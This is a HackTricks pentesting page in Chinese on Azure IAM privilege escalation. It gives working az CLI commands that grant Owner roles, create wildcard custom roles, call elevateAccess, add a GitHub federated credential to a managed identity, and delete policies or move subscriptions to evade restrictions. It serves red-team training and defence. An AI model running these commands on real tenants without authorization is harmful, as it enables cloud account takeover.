Az - Azure IAM Privesc (Authorization)

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

Azure IAM

有关更多信息,请参阅:

Az - Entra ID (AzureAD) & Azure IAM

Microsoft.Authorization/roleAssignments/write

此权限允许在特定范围内向主体分配角色,使攻击者可以通过将自己分配为更高权限的角色来提升权限:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Microsoft.Authorization/roleDefinitions/Write

此权限允许修改角色所授予的权限,攻击者可通过向分配给自己的角色授予更多权限来进行提权。

创建文件 role.json 并写入以下 内容:

{
"roleName": "<name of the role>",
"Name": "<name of the role>",
"IsCustom": true,
"Description": "Custom role with elevated privileges",
"Actions": ["*"],
"NotActions": [],
"DataActions": ["*"],
"NotDataActions": [],
"AssignableScopes": ["/subscriptions/<subscription-id>"],
"id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>",
}

然后调用之前的定义来更新角色权限:

az role definition update --role-definition role.json

Microsoft.Authorization/elevateAccess/action

此权限允许提升权限并能够将权限分配给任何主体以访问 Azure 资源。它应授予 Entra ID Global Administrators,使他们也能管理对 Azure 资源的权限。

Tip

我认为用户需要在 Entra ID 中成为 Global Administrator,才能使 elevate 调用生效。

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<obeject-id>" --role "Owner" --scope "/"

Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write

该权限允许向 managed identities 添加 Federated credentials。 例如,将 Github Actions 在某个 repo 的访问授予一个 managed identity。然后,它允许 访问任何用户定义的 managed identity

示例命令,用于将 Github 中某个 repo 的访问权限授予一个 managed identity:

# Generic example:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'

# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'

Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete

拥有对 management group、subscription 或 resource group 的权限 Microsoft.Authorization/policyAssignments/writeMicrosoft.Authorization/policyAssignments/delete 的攻击者可以 修改或删除 Azure 策略分配,可能 禁用阻止特定操作的安全限制

这将允许访问先前受该策略保护的资源或功能。

删除策略分配:

az policy assignment delete \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

禁用策略分配:

az policy assignment update \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
--enforcement-mode Disabled

验证更改:

# List policy assignments
az policy assignment list \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

# Show specific policy assignment details
az policy assignment show \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Microsoft.Authorization/policyDefinitions/write

拥有权限 Microsoft.Authorization/policyDefinitions/write 的攻击者可以修改 Azure 策略定义,更改在整个环境中控制安全限制的规则。

例如,限制允许创建资源区域的策略可以被修改为允许任何区域,或者可以更改策略效果使其失效。

修改策略定义:

az policy definition update \
--name "<policyDefinitionName>" \
--rules @updated-policy-rules.json

验证更改:

az policy definition list --output table

az policy definition show --name "<policyDefinitionName>"

Microsoft.Management/managementGroups/write

拥有权限 Microsoft.Management/managementGroups/write 的攻击者可以修改管理组的层级结构创建新的管理组,从而可能规避在更高层级应用的限制性策略。

例如,攻击者可以创建一个没有限制性策略的新管理组,然后将订阅移动到该管理组。

创建新的管理组:

az account management-group create \
--name "yourMGname" \
--display-name "yourMGDisplayName"

修改管理组层级:

az account management-group update \
--name "<managementGroupId>" \
--parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"

验证更改:

az account management-group list --output table

az account management-group show \
--name "<managementGroupId>" \
--expand

Microsoft.Management/managementGroups/subscriptions/write

拥有权限 Microsoft.Management/managementGroups/subscriptions/write 的攻击者可以 在管理组之间移动订阅,并可能通过将订阅移到策略更宽松或没有策略的组来 规避限制性策略

将订阅移动到不同的管理组:

az account management-group subscription add \
--name "<managementGroupName>" \
--subscription "<subscriptionId>"

验证更改:

az account management-group subscription show \
--name "<managementGroupId>" \
--subscription "<subscriptionId>"

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks